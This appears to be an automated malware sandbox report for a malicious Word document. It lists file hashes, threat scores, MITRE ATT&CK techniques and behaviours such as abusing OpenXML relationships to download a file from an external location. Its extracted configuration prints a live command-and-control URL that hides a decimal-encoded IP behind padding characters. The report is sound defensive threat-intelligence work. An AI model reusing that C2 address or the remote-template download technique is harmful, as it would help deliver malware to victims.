Overview

overview

10

Static

static

10

533ec2002e...e.docx

windows7-x64

8

533ec2002e...e.docx

windows10-2004-x64

1

Sharing

Copy URL
Twitter E-mail

General

  • Target

    d07eb11e2f72bde21377460c4eaebfa4.bin

  • Size

    7KB

  • Sample

    230209-jme6qsad2v

  • MD5

    f32b82fc5264b1a0a33c0e1d88550a9e

  • SHA1

    31d18b98c7e6d61198bc8e0e3627e3a691ec8aae

  • SHA256

    5fb235ba9153aa17a72c83561c5dc78b244006d10657cef25b1596bcbfaeae72

  • SHA512

    d868c15662aa10b643f43a70d1be670804eee76216e5653ea6838060a14c2bbcfcab77122bdcad7fb8c29d0f6e8237ff5ab855b12c4ff6e2f3725318d2a6cb7c

  • SSDEEP

    192:fmFCLx8ZWpEWaSrmuLIWf21vsEB1udHFCPDmWya8wjna12VwI:+FCeCm7i21v/B1GHQPZn7V5

Score
10/10
websettings

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

http://dgdfg00000000hfjf0000000ghfghfgh000000gfhfg0000hfgsdgfggd0000fgdfge00000rtdfgd00000fg00dfg@3221479282/78.doc

Targets

    • Target

      533ec2002e6dcf5cc585823bacd4647a1fb83758993ba716be76f24c0a2fa2ae.doc

    • Size

      10KB

    • MD5

      d07eb11e2f72bde21377460c4eaebfa4

    • SHA1

      729b4f7d337e88ea40c0d417bd2808f275de733e

    • SHA256

      533ec2002e6dcf5cc585823bacd4647a1fb83758993ba716be76f24c0a2fa2ae

    • SHA512

      7a0f0fdecbdc2a8c9b78791b776c95d9a58fb857be65bc0d57b28508eab0080a44f0a16e0d1114e7b2146705186376dbffef22bc0a4ef918ae51c2087db2b66a

    • SSDEEP

      192:ScIMmtP5hG/b7XN+eO/xXkO+5+5F7Jar/YEChI3UqR:SPXRE7XtOJXk7wtar/YECOUe

    Score
    8/10

    • Blocklisted process makes network request

    • Abuses OpenXML format to download file from external location

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Exploitation for Client Execution

1
T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks